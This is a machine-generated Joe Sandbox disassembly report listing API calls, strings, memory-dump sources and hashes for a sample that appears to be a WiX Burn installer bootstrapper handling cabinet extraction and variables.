                                                                                                                                                                                                                                                                                                  • Opcode ID: c5e432351266d169dbc9632539799f2009e1599a356e3ef39dc2205434c71b07
                                                                                                                                                                                                                                                                                                  • Instruction ID: cd44c0959804d6a50f38dccb5ab671cfe8a87a841f5e7e3b94c060af88d13201
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5e432351266d169dbc9632539799f2009e1599a356e3ef39dc2205434c71b07
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8219232941AB69BDB256B65AD07F4679B0FB40B56F0A0135FE10EB362F779CC009AD0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 008808F2
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 0088090A
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 0088090F
                                                                                                                                                                                                                                                                                                  • DuplicateHandle.KERNELBASE(00000000,?,?), ref: 00880912
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 0088091C
                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 0088098B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 00880998
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • cabextract.cpp, xrefs: 00880940, 008809BC
                                                                                                                                                                                                                                                                                                  • Failed to open cabinet file: %hs, xrefs: 008809C9
                                                                                                                                                                                                                                                                                                  • Failed to add virtual file pointer for cab container., xrefs: 00880971
                                                                                                                                                                                                                                                                                                  • Failed to duplicate handle to cab container., xrefs: 0088094A
                                                                                                                                                                                                                                                                                                  • <the>.cab, xrefs: 008808EB
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
                                                                                                                                                                                                                                                                                                  • String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3030546534-3446344238
                                                                                                                                                                                                                                                                                                  • Opcode ID: c4f767ae7353d5e90d1456c39a8d3a503b4a6792c2a77f880eae8eb34f978523
                                                                                                                                                                                                                                                                                                  • Instruction ID: 07627626f9bb4b867b634fb37890fa9604e8b9ba24bd8d1735860963a4556345
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c4f767ae7353d5e90d1456c39a8d3a503b4a6792c2a77f880eae8eb34f978523
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1031E432A4163ABBEB216B958C49F9EBE68FF05760F110111FE14F7652D7609D008BE1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000001,?,00000000,00865445,00000006,?,008682B9,?,?,?,00000000,00000000,00000001), ref: 00866DC8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008656A9: CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,00866595,00866595,?,0086563D,?,?,00000000), ref: 008656E5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008656A9: GetLastError.KERNEL32(?,0086563D,?,?,00000000,?,?,00866595,?,00867F02,?,?,?,?,?), ref: 00865714
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000001,?,00000000,00000001,00000000,00000000,?,008682B9), ref: 00866F59
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to find variable value '%ls'., xrefs: 00866DE3
                                                                                                                                                                                                                                                                                                  • Failed to insert variable '%ls'., xrefs: 00866E0D
                                                                                                                                                                                                                                                                                                  • variable.cpp, xrefs: 00866E4B
                                                                                                                                                                                                                                                                                                  • Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 00866ED0
                                                                                                                                                                                                                                                                                                  • Setting hidden variable '%ls', xrefs: 00866E86
                                                                                                                                                                                                                                                                                                  • Attempt to set built-in variable value: %ls, xrefs: 00866E56
                                                                                                                                                                                                                                                                                                  • Failed to set value of variable: %ls, xrefs: 00866F41
                                                                                                                                                                                                                                                                                                  • Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 00866F6B
                                                                                                                                                                                                                                                                                                  • Unsetting variable '%ls', xrefs: 00866F15
                                                                                                                                                                                                                                                                                                  • Setting numeric variable '%ls' to value %lld, xrefs: 00866EFA
                                                                                                                                                                                                                                                                                                  • Setting string variable '%ls' to value '%ls', xrefs: 00866EED
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$CompareEnterErrorLastLeaveString
                                                                                                                                                                                                                                                                                                  • String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2716280545-445000439
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8519ac4ecf5c7e35ffcc9fa3d314e6a79f6aa1df610add67a1938c30acb112f8
                                                                                                                                                                                                                                                                                                  • Instruction ID: 92bc816cbcbeeb3b0a9ea8836e1ed5c59789c67d48921c2d0f43e8daf96af143
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8519ac4ecf5c7e35ffcc9fa3d314e6a79f6aa1df610add67a1938c30acb112f8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10513C71A40295A7EB309F58DC4AF6B3BA8FF56714F220019F805D6782E676DC60CBE1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(000000FF,00000000,00000001,00000002,?,00000000,?,?,00864E11,?,?), ref: 00876A77
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,?,00864E11,?,?), ref: 00876A7D
                                                                                                                                                                                                                                                                                                  • DuplicateHandle.KERNELBASE(00000000,?,?,00864E11,?,?), ref: 00876A80
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00864E11,?,?), ref: 00876A8A
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF,?,00864E11,?,?), ref: 00876B03
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to duplicate file handle for attached container., xrefs: 00876AB8
                                                                                                                                                                                                                                                                                                  • burn.filehandle.attached, xrefs: 00876AD0
                                                                                                                                                                                                                                                                                                  • core.cpp, xrefs: 00876AAE
                                                                                                                                                                                                                                                                                                  • %ls -%ls=%u, xrefs: 00876AD7
                                                                                                                                                                                                                                                                                                  • Failed to append the file handle to the command line., xrefs: 00876AEB
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentHandleProcess$CloseDuplicateErrorLast
                                                                                                                                                                                                                                                                                                  • String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to duplicate file handle for attached container.$burn.filehandle.attached$core.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 4224961946-4196573879
                                                                                                                                                                                                                                                                                                  • Opcode ID: 97e8ad8f422d37b21ebab34ac928a7ddde2143f60ccfdedf084c70d5a7b7e880
                                                                                                                                                                                                                                                                                                  • Instruction ID: ec392c32d8694bde0a94d4fbbd43c14710b894ef4170d8844a638398c0f23998
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97e8ad8f422d37b21ebab34ac928a7ddde2143f60ccfdedf084c70d5a7b7e880
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE117232940626BBDB11ABA89C06E9EBB68FF05770F118251F924F73D1E774DD109690
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(?,00000008,?,008653BD,00000000,?,?,?,?,?,?,?,0087769D,00000000), ref: 008A0897
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,0087769D,00000000), ref: 008A08A1
                                                                                                                                                                                                                                                                                                  • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,0087769D,00000000), ref: 008A08D3
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,0087769D,00000000), ref: 008A08EC
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,0087769D,00000000), ref: 008A092B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastToken$CloseHandleInformationOpenProcess
                                                                                                                                                                                                                                                                                                  • String ID: procutil.cpp
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000005,?,00000003,00000080,00000000,?,00000000,?,?,?), ref: 00876B49
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00876BB9
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseCreateFileHandle
                                                                                                                                                                                                                                                                                                  • String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to append the file handle to the obfuscated command line.$burn.filehandle.self
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 008A3574
                                                                                                                                                                                                                                                                                                  • InterlockedIncrement.KERNEL32(008CB6C8), ref: 008A3591
                                                                                                                                                                                                                                                                                                  • CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,008CB6B8,?,?,?,?,?,?), ref: 008A35AC
                                                                                                                                                                                                                                                                                                  • CLSIDFromProgID.OLE32(MSXML.DOMDocument,008CB6B8,?,?,?,?,?,?), ref: 008A35B8
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FromProg$IncrementInitializeInterlocked
                                                                                                                                                                                                                                                                                                  • String ID: MSXML.DOMDocument$Msxml2.DOMDocument
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 008A4A9D
                                                                                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 008A4ACA
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,?,00000000), ref: 008A4AF6
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,008AB7A0,?,00000000,?,00000000,?,00000000), ref: 008A4B34
                                                                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 008A4B65
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$Global$AllocFree
                                                                                                                                                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,0089FFEF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0089FFEF,008812CF,?,00000000), ref: 0086246E
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0089FFEF,008812CF,?,00000000,0000FDE9,?,008812CF), ref: 0086247A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,008621CC,000001C7,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863BDB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863BD3: HeapSize.KERNEL32(00000000,?,008621CC,000001C7,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863BE2
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
                                                                                                                                                                                                                                                                                                  • String ID: strutil.cpp
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 00880B27
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?), ref: 00880B31
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • cabextract.cpp, xrefs: 00880B55
                                                                                                                                                                                                                                                                                                  • Failed to move file pointer 0x%x bytes., xrefs: 00880B62
                                                                                                                                                                                                                                                                                                  • Invalid seek type., xrefs: 00880ABD
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                                                  • String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,0087A0E8,00000000,00000000,?,00000000,008653BD,00000000,?,?,0086D5B5,?), ref: 00864123
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0087A0E8,00000000,00000000,?,00000000,008653BD,00000000,?,?,0086D5B5,?,00000000,00000000), ref: 00864131
                                                                                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,840F01E8,00865489,?,0087A0E8,00000000,00000000,?,00000000,008653BD,00000000,?,?,0086D5B5,?,00000000), ref: 0086419A
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0087A0E8,00000000,00000000,?,00000000,008653BD,00000000,?,?,0086D5B5,?,00000000,00000000), ref: 008641A4
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                                                                                  • String ID: dirutil.cpp
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,00866595,00866595,?,0086563D,?,?,00000000), ref: 008656E5
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086563D,?,?,00000000,?,?,00866595,?,00867F02,?,?,?,?,?), ref: 00865714
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareErrorLastString
                                                                                                                                                                                                                                                                                                  • String ID: Failed to compare strings.$variable.cpp$version.dll
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,00864F1C,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 008A0A38
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00864F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 008A0A46
                                                                                                                                                                                                                                                                                                  • GetExitCodeProcess.KERNELBASE(000000FF,?), ref: 008A0A8B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00864F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 008A0A95
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CodeExitObjectProcessSingleWait
                                                                                                                                                                                                                                                                                                  • String ID: procutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 590199018-1178289305
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6e780120733f8e12da1b8c6bc6a48faf99a46d494ea768030206576a7eb7f1c6
                                                                                                                                                                                                                                                                                                  • Instruction ID: 31788459657e517acd3509a7d576dfd9304a501343456f0e086217d5ef269734
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e780120733f8e12da1b8c6bc6a48faf99a46d494ea768030206576a7eb7f1c6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F11E537D01336EBE7208B948908A9F7AA4FF06760F124265FD54EB680E270AD009ED1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0088140C: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00880A19,?,?,?), ref: 00881434
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0088140C: GetLastError.KERNEL32(?,00880A19,?,?,?), ref: 0088143E
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 00880A27
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00880A31
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • cabextract.cpp, xrefs: 00880A55
                                                                                                                                                                                                                                                                                                  • Failed to read during cabinet extraction., xrefs: 00880A5F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLast$PointerRead
                                                                                                                                                                                                                                                                                                  • String ID: Failed to read during cabinet extraction.$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2170121939-2426083571
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0ae57e062684f3ad303129eed0d0cfad3eeca20c9c79a968d251df268c86e7c1
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8129b7372303b312ccfe3a6f9df66f038d69102274d6be6213ad92c4ec67b051
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ae57e062684f3ad303129eed0d0cfad3eeca20c9c79a968d251df268c86e7c1
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F11E136A40639BBCB25AF95DC04E9E7F68FF05760B014115FD14E7251D7309910CBD1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00880A19,?,?,?), ref: 00881434
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00880A19,?,?,?), ref: 0088143E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • cabextract.cpp, xrefs: 00881462
                                                                                                                                                                                                                                                                                                  • Failed to move to virtual file pointer., xrefs: 0088146C
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                                                  • String ID: Failed to move to virtual file pointer.$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2976181284-3005670968
                                                                                                                                                                                                                                                                                                  • Opcode ID: cdb80c616769c6a4a0b3caa111be92d7437664c0d272262089ff1804e7cda9b2
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2676704896b81c82ad6e41e5e311f31eab92263f25420ed17688bb40f6df34f0
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cdb80c616769c6a4a0b3caa111be92d7437664c0d272262089ff1804e7cda9b2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B401F23390063AB7DB216A9A8C08ACBBF29FF00770B118125FD28EA601DB35DC10C7D5
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 008A3F73
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008A3FD6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastRead
                                                                                                                                                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1948546556-2967768451
                                                                                                                                                                                                                                                                                                  • Opcode ID: cbda45785035efe354ad8db130d00f0abbf868e5e0dcedd072c6a35420c3836b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 10862d9ac8bde603e9f6b5d80c2ffce5d9c11d11ca1fe880fc1c38f653a53737
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cbda45785035efe354ad8db130d00f0abbf868e5e0dcedd072c6a35420c3836b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98318C71E102699FEB21CE58CC40BEAB7B4FB45751F0040AAFA48E7640DBB49EC49B91
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,008A3F9A,?,?,?), ref: 008A4E5E
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,008A3F9A,?,?,?), ref: 008A4E68
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 442123175-2967768451
                                                                                                                                                                                                                                                                                                  APIs
